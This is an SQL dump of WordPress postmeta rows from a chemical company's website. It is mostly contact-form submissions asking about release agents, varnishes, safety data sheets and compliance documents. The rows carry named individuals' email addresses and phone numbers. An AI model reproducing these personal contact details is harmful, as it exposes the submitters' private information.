INSERT INTO `wp_postmeta` VALUES (41275, 4782, '_field_1', 'Devin'); 
INSERT INTO `wp_postmeta` VALUES (41276, 4782, '_field_10', 'Sunshine Factory Co., Ltd'); 
INSERT INTO `wp_postmeta` VALUES (41277, 4782, '_field_2', 'devin@yaolongchem.com'); 
INSERT INTO `wp_postmeta` VALUES (41278, 4782, '_field_8', '(159) 006-7879'); 
INSERT INTO `wp_postmeta` VALUES (41279, 4782, '_field_3', 'Dear Sir/Madam,\r\nThis is Devin from Sunshine Factory in Chengdu, China. I&#039;m writing to share an innovative material-- zirconium phosphate used as additive for adhesive with you.\r\n\r\nThe advantages\r\nZirconium phosphate is white power. Used as additive for adhesive,it can improve following performances:\r\n\r\n1. better resistance to corrosion,high-temperature, impact, flame;\r\n2. strengthen it&#039;s mechanical strength &amp; tenacity;\r\n3. increase it&#039;s adhesive force &amp; viscosity;\r\n4. better chemical stability;\r\n5. reduce the thermal expansion coefficient\r\n\r\nFor anymore questions, please be free to contact me.'); 
INSERT INTO `wp_postmeta` VALUES (41280, 4782, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41281, 4782, '_sub_id', '4782'); 
INSERT INTO `wp_postmeta` VALUES (41282, 4783, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41283, 4783, '_seq_num', '870'); 
INSERT INTO `wp_postmeta` VALUES (41284, 4783, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41285, 4783, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41286, 4783, '_field_1', 'YUKIO FUKUNAGA'); 
INSERT INTO `wp_postmeta` VALUES (41287, 4783, '_field_10', 'CENTURY INTERNATIONAL INC.'); 
INSERT INTO `wp_postmeta` VALUES (41288, 4783, '_field_2', 'yufuku@c-i.jp'); 
INSERT INTO `wp_postmeta` VALUES (41289, 4783, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41290, 4783, '_field_3', 'Please quote on 1 bottle of MS-111, Epoxy Stripping agent, need price including shipping charge to Tokyo, Japan.\nPayable by credit card?\n\nBest regards,     Yukio Fukunaga\n\nCentury International Inc.\nTokyo, Japan'); 
INSERT INTO `wp_postmeta` VALUES (41291, 4783, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41292, 4783, '_sub_id', '4783'); 
INSERT INTO `wp_postmeta` VALUES (41293, 4784, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41294, 4784, '_seq_num', '871'); 
INSERT INTO `wp_postmeta` VALUES (41295, 4784, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41296, 4784, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41297, 4784, '_field_1', 'Joe Ziadeh'); 
INSERT INTO `wp_postmeta` VALUES (41298, 4784, '_field_10', 'Estes Express Lines'); 
INSERT INTO `wp_postmeta` VALUES (41299, 4784, '_field_2', 'joe.ziadeh@estes-express.com'); 
INSERT INTO `wp_postmeta` VALUES (41300, 4784, '_field_8', '(804) 353-1900'); 
INSERT INTO `wp_postmeta` VALUES (41301, 4784, '_field_3', 'I am looking to add epoxy resin to a yellow paint that will be sprayed onto a concrete floor using an airless paint sprayer. The floor will have heavy forklift traffic. Which product do you recommend for mixing with latex or acrylic paint? What will be the cost per gallon. The work will be performed in West Sacremento CA'); 
INSERT INTO `wp_postmeta` VALUES (41302, 4784, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41303, 4784, '_sub_id', '4784'); 
INSERT INTO `wp_postmeta` VALUES (41304, 4785, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41305, 4785, '_seq_num', '872'); 
INSERT INTO `wp_postmeta` VALUES (41306, 4785, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41307, 4785, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41308, 4785, '_field_1', 'srinivasan murali'); 
INSERT INTO `wp_postmeta` VALUES (41309, 4785, '_field_10', 'maax lubrication pvt ltd'); 
INSERT INTO `wp_postmeta` VALUES (41310, 4785, '_field_2', 'smurali@maaxlubrication.com'); 
INSERT INTO `wp_postmeta` VALUES (41311, 4785, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (41312, 4785, '_field_3', 'we are interested in water based release for composite material (clutch pad) , please suggest the right product  from your range to proceed further , you can also reach me in +91 94444 13635'); 
INSERT INTO `wp_postmeta` VALUES (41313, 4785, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41314, 4785, '_sub_id', '4785'); 
INSERT INTO `wp_postmeta` VALUES (41315, 4786, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (41316, 4786, '_seq_num', '345'); 
INSERT INTO `wp_postmeta` VALUES (41317, 4786, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41318, 4786, '_field_12', 'Eric Giles'); 
INSERT INTO `wp_postmeta` VALUES (41319, 4786, '_field_13', 'TAE Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (41320, 4786, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (41321, 4786, '_field_14', 'eric.giles@taeaviation.com.au'); 
INSERT INTO `wp_postmeta` VALUES (41322, 4786, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (41323, 4786, '_field_16', 'I have a Component Maintenance Manual that was written in 1988 and requires the use of MS-450 Protective Varnish. I believe this was one of your products. I would appreciate it if you could suggest an equivalent product and advise if it was acrylic or urethane based.\n\nThanks.'); 
INSERT INTO `wp_postmeta` VALUES (41324, 4786, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (41325, 4786, '_sub_id', '4786'); 
INSERT INTO `wp_postmeta` VALUES (41326, 4787, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41327, 4787, '_seq_num', '873'); 
INSERT INTO `wp_postmeta` VALUES (41328, 4787, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41329, 4787, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41330, 4787, '_field_1', 'Aras Gunday'); 
INSERT INTO `wp_postmeta` VALUES (41331, 4787, '_field_10', 'Adalar Kimya'); 
INSERT INTO `wp_postmeta` VALUES (41332, 4787, '_field_2', 'aras.gunday@adalarkimya.com'); 
INSERT INTO `wp_postmeta` VALUES (41333, 4787, '_field_8', '(026) 272-4890'); 
INSERT INTO `wp_postmeta` VALUES (41334, 4787, '_field_3', 'Dear Sir,\r\n\r\nI wish you a good day ahead.\r\n\r\nWe are an adhesive company from Turkey. We produce, HOTMELT, WOODWORKİNG ADHESİVES , PVA BASED GLUE AND PU ADHESIVES in our production facility.\r\n\r\nWe make export to over 45 countries with private labelling.\r\n\r\nWe would like to work with you company.\r\n\r\nIf you are interested in our offer, we will be happy to answer your questions.\r\n\r\nSincerely\r\n'); 
INSERT INTO `wp_postmeta` VALUES (41335, 4787, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41336, 4787, '_sub_id', '4787'); 
INSERT INTO `wp_postmeta` VALUES (41337, 4788, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41338, 4788, '_seq_num', '874'); 
INSERT INTO `wp_postmeta` VALUES (41339, 4788, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41340, 4788, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41341, 4788, '_field_1', 'Criss Norman'); 
INSERT INTO `wp_postmeta` VALUES (41342, 4788, '_field_10', 'MSDSonline'); 
INSERT INTO `wp_postmeta` VALUES (41343, 4788, '_field_2', 'cnorman@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (41344, 4788, '_field_8', '9145748035'); 
INSERT INTO `wp_postmeta` VALUES (41345, 4788, '_field_3', 'Request for GHS/ANSI-OSHA compliant [M]SDS (Batch : B4777, Project_ID : BAE_1450)\r\n\r\nHello,\r\n\r\nI am looking to obtain the latest GHS / ANSI-OSHA complaint [M]SDS on behalf of a mutual client, BAE Systems Intelligence and Security, which I was not able to locate on your website.\r\n\r\nThe products are:\r\n\r\n1) Product Name: MS-122RB DPMS-Y0716A PTFE Release Agent/Dry Lubricant\r\n   Product Code: Not Available\r\n\r\n2) Product Name: MS-475N Acrylic Conformal Coating\r\n   Product Code: Not Available\r\n\r\nBAE Systems Intelligence and Security is a US client and would prefer an GHS/ANSI-OSHA compliant [M]SDS if available. If not, we gladly accept the regulatory format your [M]SDS come in. For your records please see the attached authorization letter from BAE Systems Intelligence and Security.\r\n\r\nPlease email pdf versions of the [M]SDS to cnorman@ehs.com and if you could mention our Reference Number B4777 in the subject line that would be appreciated. If the product is not hazardous and does not require [M]SDS, could you please email us an Exempt Letter indicating the same?\r\n\r\nIf you require any additional information, please do not hesitate to ask. Thank you for your time.\r\n\r\nRegards,\r\nCriss Norman.'); 
INSERT INTO `wp_postmeta` VALUES (41346, 4788, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41347, 4788, '_sub_id', '4788'); 
INSERT INTO `wp_postmeta` VALUES (41348, 4789, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41349, 4789, '_seq_num', '875'); 
INSERT INTO `wp_postmeta` VALUES (41350, 4789, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41351, 4789, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41352, 4789, '_field_1', 'Jim Zelina'); 
INSERT INTO `wp_postmeta` VALUES (41353, 4789, '_field_10', 'Libra Industries'); 
INSERT INTO `wp_postmeta` VALUES (41354, 4789, '_field_2', 'jzelina@libraind.com'); 
INSERT INTO `wp_postmeta` VALUES (41355, 4789, '_field_8', '(440) 205-3352'); 
INSERT INTO `wp_postmeta` VALUES (41356, 4789, '_field_3', 'Do you have a REACH compliance report for MS-470C?\nthanks'); 
INSERT INTO `wp_postmeta` VALUES (41357, 4789, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41358, 4789, '_sub_id', '4789'); 
INSERT INTO `wp_postmeta` VALUES (41359, 4790, '_edit_lock', '1502218373:2'); 
INSERT INTO `wp_postmeta` VALUES (41360, 4790, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (41361, 4791, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41362, 4791, '_seq_num', '876'); 
INSERT INTO `wp_postmeta` VALUES (41363, 4791, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41364, 4791, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41365, 4791, '_field_1', 'Tim Moore'); 
INSERT INTO `wp_postmeta` VALUES (41366, 4791, '_field_10', 'Kamatics'); 
INSERT INTO `wp_postmeta` VALUES (41367, 4791, '_field_2', 'Timothy.Moore@Kaman.com'); 
INSERT INTO `wp_postmeta` VALUES (41368, 4791, '_field_8', '(860) 769-3214'); 
INSERT INTO `wp_postmeta` VALUES (41369, 4791, '_field_3', 'Good Morning,\nWe currently use your MS-452N protective varnish but have a requirement for a varnish that conforms to MIL-C-22750, Type I.\nWould we be able to use the MS-452N? If not could you help in supplying product to meet the Mil spec requirement?'); 
INSERT INTO `wp_postmeta` VALUES (41370, 4791, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41371, 4791, '_sub_id', '4791'); 
INSERT INTO `wp_postmeta` VALUES (41372, 4790, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (41373, 4790, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (41374, 4792, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (41375, 4792, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (41376, 4792, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (41377, 4792, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (41378, 4792, '_menu_item_object_id', '4790'); 
INSERT INTO `wp_postmeta` VALUES (41379, 4792, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (41380, 4792, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (41381, 4792, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (41382, 4792, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (41383, 4792, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (41384, 4790, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (41385, 4790, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (41386, 4790, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (41387, 4790, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (41388, 4795, '_form_id', '18'); 
INSERT INTO `wp_postmeta` VALUES (41389, 4795, '_seq_num', '1'); 
INSERT INTO `wp_postmeta` VALUES (41390, 4795, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41391, 4795, '_field_33', ''); 
INSERT INTO `wp_postmeta` VALUES (41392, 4795, '_field_34', ''); 
INSERT INTO `wp_postmeta` VALUES (41393, 4795, '_field_35', ''); 
INSERT INTO `wp_postmeta` VALUES (41394, 4795, '_field_36', ''); 
INSERT INTO `wp_postmeta` VALUES (41395, 4795, '_field_37', ''); 
INSERT INTO `wp_postmeta` VALUES (41396, 4795, '_field_38', ''); 
INSERT INTO `wp_postmeta` VALUES (41397, 4795, '_field_39', ''); 
INSERT INTO `wp_postmeta` VALUES (41398, 4795, '_field_41', 'a:7:{i:0;s:19:"Krytox GPL Products";i:1;s:25:"Krytox Aerospace Products";i:2;s:26:"Krytox Automotive Products";i:3;s:21:"Other Krytox Products";i:4;s:14:"Release Agents";i:5;s:18:"Conformal Coatings";i:6;s:16:"Medical Products";}'); 
INSERT INTO `wp_postmeta` VALUES (41399, 4795, '_field_43', ''); 
INSERT INTO `wp_postmeta` VALUES (41400, 4795, '_sub_id', '4795'); 
INSERT INTO `wp_postmeta` VALUES (41401, 4807, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (41402, 4807, '_seq_num', '346'); 
INSERT INTO `wp_postmeta` VALUES (41403, 4807, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41404, 4807, '_field_12', 'Carlos Moreno'); 
INSERT INTO `wp_postmeta` VALUES (41405, 4807, '_field_13', 'Oleo International'); 
INSERT INTO `wp_postmeta` VALUES (41406, 4807, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (41407, 4807, '_field_14', 'carlos.moreno@oleo.co.uk'); 
INSERT INTO `wp_postmeta` VALUES (41408, 4807, '_field_15', '(024) 766-4555'); 
INSERT INTO `wp_postmeta` VALUES (41409, 4807, '_field_16', 'I would like to get a lubricant with the purpose of reducing friction during a deep-drawing like operation.\nI had PTFE based lubricant in mind, but I am open to any suggestions.\nThe materials involved could be either steel or aluminium.\nCould you suggest the most suitable product for this?\n'); 
INSERT INTO `wp_postmeta` VALUES (41410, 4807, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (41411, 4807, '_sub_id', '4807'); 
INSERT INTO `wp_postmeta` VALUES (41412, 4808, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (41413, 4808, '_seq_num', '877'); 
INSERT INTO `wp_postmeta` VALUES (41414, 4808, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41415, 4808, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (41416, 4808, '_field_1', 'Kathy stout'); 
INSERT INTO `wp_postmeta` VALUES (41417, 4808, '_field_10', 'Columbia Research Labs'); 
INSERT INTO `wp_postmeta` VALUES (41418, 4808, '_field_2', 'kstout@crlsensors.com'); 
INSERT INTO `wp_postmeta` VALUES (41419, 4808, '_field_8', '(610) 872-3900'); 
INSERT INTO `wp_postmeta` VALUES (41420, 4808, '_field_3', 'Hello - can you please change our contact person from Jessica Portner to Jessica Jones - thank you and take care, Kathy'); 
INSERT INTO `wp_postmeta` VALUES (41421, 4808, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (41422, 4808, '_sub_id', '4808'); 
INSERT INTO `wp_postmeta` VALUES (41426, 4812, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (41427, 4812, '_seq_num', '347'); 
INSERT INTO `wp_postmeta` VALUES (41428, 4812, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (41429, 4812, '_field_12', 'MOUMEN Imane'); 
INSERT INTO `wp_postmeta` VALUES (41430, 4812, '_field_13', 'GACHES-CHIMIE'); 
INSERT INTO `wp_postmeta` VALUES (41431, 4812, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (41432, 4812, '_field_14', 'imoumen@gaches.com'); 
INSERT INTO `wp_postmeta` VALUES (41433, 4812, '_field_15', '(056) 271-9595'); 
INSERT INTO `wp_postmeta` VALUES (41434, 4812, '_field_16', 'Bonjour,\r\nPourriez-vous SVP nous transmettre la dernière version de la FDS au format CLP, ainsi que la FT en français et en anglais du produit &quot;MS-143TE&quot;.\r\nNous vous informons que notre société est mandatée par le Groupe Stelia pour la recherche de documents techniques, de ce fait nous comptons bien sur votre aide précieuse;\r\nDans l&#039;attente de votre retour.\r\nEn vous remerciant par avance.\r\nSalutations respectueuses'); 
INSERT INTO `wp_postmeta` VALUES (41435, 4812, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (41436, 4812, '_sub_id', '4812'); 
INSERT INTO `wp_postmeta` VALUES (41437, 4815, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (41438, 4815, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (41439, 4815, '_menu_item_object_id', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41440, 4815, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (41441, 4815, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (41442, 4815, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (41443, 4815, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (41444, 4815, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (41445, 4814, '_schema_type', 'Article'); 
INSERT INTO `wp_postmeta` VALUES (41446, 4814, '_schema_article_type', 'BlogPosting'); 
INSERT INTO `wp_postmeta` VALUES (41447, 4814, '_schema_post_types', 'a:1:{i:0;s:4:"post";}'); 
INSERT INTO `wp_postmeta` VALUES (41448, 4219, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41449, 3767, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41450, 3760, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41451, 3753, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41452, 3744, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41453, 3726, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41454, 3610, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41455, 3237, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41456, 3190, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41457, 3187, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41458, 3160, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41459, 3152, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41460, 3064, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41461, 3036, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41462, 3015, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41463, 2989, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41464, 2978, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41465, 2936, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41466, 2886, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41467, 2869, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41468, 2773, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41469, 2694, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41470, 2618, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41471, 2552, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41472, 2507, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41473, 2503, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41474, 2474, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41475, 2450, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41476, 2442, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41477, 2410, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41478, 2390, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41479, 2381, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41480, 2375, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41481, 2322, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41482, 2317, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41483, 2311, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41484, 2308, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41485, 2305, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41486, 2302, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41487, 2277, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41488, 2056, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41489, 2050, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41490, 1601, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41491, 1525, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41492, 1135, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41493, 1128, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41494, 1121, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41495, 1117, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41496, 1115, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41497, 1113, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41498, 662, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41499, 4817, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (41500, 4817, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (41501, 4817, '_menu_item_object_id', '4816'); 
INSERT INTO `wp_postmeta` VALUES (41502, 4817, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (41503, 4817, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (41504, 4817, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (41505, 4817, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (41506, 4817, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (41507, 4816, '_schema_type', 'Article'); 
INSERT INTO `wp_postmeta` VALUES (41508, 4816, '_schema_post_types', 'a:1:{i:0;s:4:"page";}'); 
INSERT INTO `wp_postmeta` VALUES (41509, 4790, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41510, 4416, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41511, 4321, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41512, 2526, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41513, 2150, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41514, 2058, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41515, 2046, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41516, 1871, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41517, 1842, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41518, 1480, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41519, 927, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41520, 664, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41521, 455, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41522, 204, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41523, 122, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41524, 120, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41525, 118, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41526, 116, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41527, 64, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41528, 22, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41529, 21, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41530, 20, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41531, 19, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41532, 5, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41533, 2, '_schema_ref', '4814'); 
INSERT INTO `wp_postmeta` VALUES (41536, 4818, '_wp_attached_file', '2017/08/MS-LARGE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (41537, 4818, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:995;s:6:"height";i:543;s:4:"file";s:20:"2017/08/MS-LARGE.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"MS-LARGE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"MS-LARGE-800x437.jpg";s:5:"width";i:800;s:6:"height";i:437;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"MS-LARGE-768x419.jpg";s:5:"width";i:768;s:6:"height";i:419;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"MS-LARGE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"MS-LARGE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"MS-LARGE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"MS-LARGE-510x543.jpg";s:5:"width";i:510;s:6:"height";i:543;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (41554, 22, '_schema_json', 'a:10:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:7:"Article";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:45:"https://www.miller-stephenson.com/my-account/";}s:3:"url";s:45:"https://www.miller-stephenson.com/my-account/";s:8:"headline";s:10:"My Account";s:13:"datePublished";s:25:"2016-08-15T19:19:44+00:00";s:12:"dateModified";s:25:"2016-08-15T19:19:44+00:00";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:24:"[woocommerce_my_account]";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:20:"ddillulio@mschem.com";s:3:"url";s:61:"https://www.miller-stephenson.com/author/ddilluliomschem-com/";}}'); 
